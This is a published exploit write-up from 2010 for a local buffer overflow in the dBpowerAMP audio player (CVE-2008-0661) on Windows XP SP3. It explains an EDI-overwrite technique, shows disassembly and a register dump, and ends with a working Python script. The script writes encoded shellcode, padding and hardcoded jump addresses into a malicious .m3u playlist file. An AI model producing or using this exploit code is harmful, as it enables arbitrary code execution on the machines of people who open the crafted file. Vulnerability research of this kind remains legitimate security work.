Text :  

# Exploit Title: dbpoweramp local buffer overflow, a different approch
# Date: 31/8/2010
# Author: 41.w4r10r and FB1H2S
# Software Link:
http://usfiles.brothersoft.com/mp3_audio/players/dBpowerAMP-r2.exe
# Version: [app version]
# Tested on: Microsoft XP service pack 3
# CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0661

The local exploit which was published
http://www.exploit-db.com/exploits/5069
http://www.exploit-db.com/exploits/5067, the software had an overflow,
which could be exploited if passed in with a 255 char string, it would
overwrite the EIP, but if the string goes above 255 the EIP wont be
overwritten insted the EDI would be. The published exploit uses a direct
EIP overwrite using a 255 char ( shellcode + junk ).
But it is possible to exploit the appplication with a 255+ char in the
follwoing way.

1) 270 chars overwrite the EDI and EIP remains intact
2) EDI Destination index points to our junk now, and we got controll over
EDI
3) EDI points to a data, so overwrite it to point to EDX which also hold
our junk, a jump EDX will work
4) Now EIP will be overwritten, so on second step make EIP point to EDI and
we could run our arbitary code.

###########################################################################
#####################
At the time of 255+ char the assembled code gives idea whats happening
###########################################################################
#####################
00422BD0 /$ 56 PUSH ESI
00422BD1 |. 57 PUSH EDI
00422BD2 |. 8B7C24 0C MOV EDI,DWORD PTR SS:[ESP+C]
00422BD6 |. 83C9 FF OR ECX,FFFFFFFF
00422BD9 |. 33C0 XOR EAX,EAX
00422BDB |. 6A 5C PUSH 5C ; /c =
5C ('\')
00422BDD |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
Repeat and
00422BDF |. 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14] ; |
00422BE3 |. F7D1 NOT ECX ; |
00422BE5 |. 2BF9 SUB EDI,ECX ; |
00422BE7 |. 50 PUSH EAX ; |s
00422BE8 |. 8BD1 MOV EDX,ECX ; |
00422BEA |. 8BF7 MOV ESI,EDI ; |
00422BEC |. 8BF8 MOV EDI,EAX ; |
00422BEE |. C1E9 02 SHR ECX,2 ; |
00422BF1 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>;
|
00422BF3 |. 8BCA MOV ECX,EDX ; |
00422BF5 |. 83E1 03 AND ECX,3 ; |
00422BF8 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>;
|
00422BFA |. FF15 E4A14200 CALL DWORD PTR DS:[<&MSVCRT.strrchr>]
; \strrchr
00422C00 |. 83C4 08 ADD ESP,8

#The registers at the time of the oveflow

EAX 00000000
ECX FFFFFFFF
EDX 00B9ECD8 ASCII
"http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+[Our
Junk]
EBX 00B9F110 ASCII
"http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+[Our
Junk]
ESP 00B9ECB4
EBP 77C3F931 msvcrt.sprintf
ESI 00B9F285
EDI 41414141
EIP 00422BDD Amp.00422BDD
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDC000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -??? FFFF 00000000 7C90E920
ST1 empty +UNORM 0060 00140000 00000000
ST2 empty 0.0000000076189029870e-4933
ST3 empty 0.0208724709907450280e-4933
ST4 empty +UNORM 770A 0012F850 00000000
ST5 empty 0.0208724786043381110e-4933
ST6 empty +UNORM 2CCE 0012F588 00890000
ST7 empty -??? FFFF 7C919318 7C90E920
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

###########################################################################
###################################################
#!/usr/bin/python
#
#And all greets to Garage Hackers Members.
#http://www.garage4hackers.com
#And shouts to ICW, Andhra Hackers members
#
#and our Brothers:-
#B0Nd,Eberly,Wipu,beenu,w4ri0r,empty,neo,Rohith,Sids786,SmartKD,Tia,h@xor,r
5scal,Yash,Secure_IT, Atul, Vinnu and all others.
#
#
#
#
shellcode=
("\x90\x90\xcc\x90\x90\x90\x90\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9
\x74\x24\xf4\xb1"
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
"\x7f\xe8\x7b\xca\x90\x90\x90\x90\x90\x90")
leng=260-len(shellcode)
junk = shellcode+"D"*leng
print len(junk)
junk=junk+"\xF0\xB0\x80\x7C"+"DCBA\xD8\xEC\xB9\x00"
###########################################################################
############################################
#Make EDI point to EDX using a jump EDX, DCBA\xD8\xEC\xB9\x00 from
application
#now we ill get controll over EIP Now point EIP point to EDI [ #jmp edi
\xF0\xB0\x80\x7C from kernal 32.dll Microsoft Service pack 3 ]
###########################################################################
############################################
filename = "garage4hackers.m3u";
file = open(filename,"w")
file.writelines(junk)
file.close()
print "File Is created"
print "Press Any Key To Continue........."
raw_input()

  References :  

None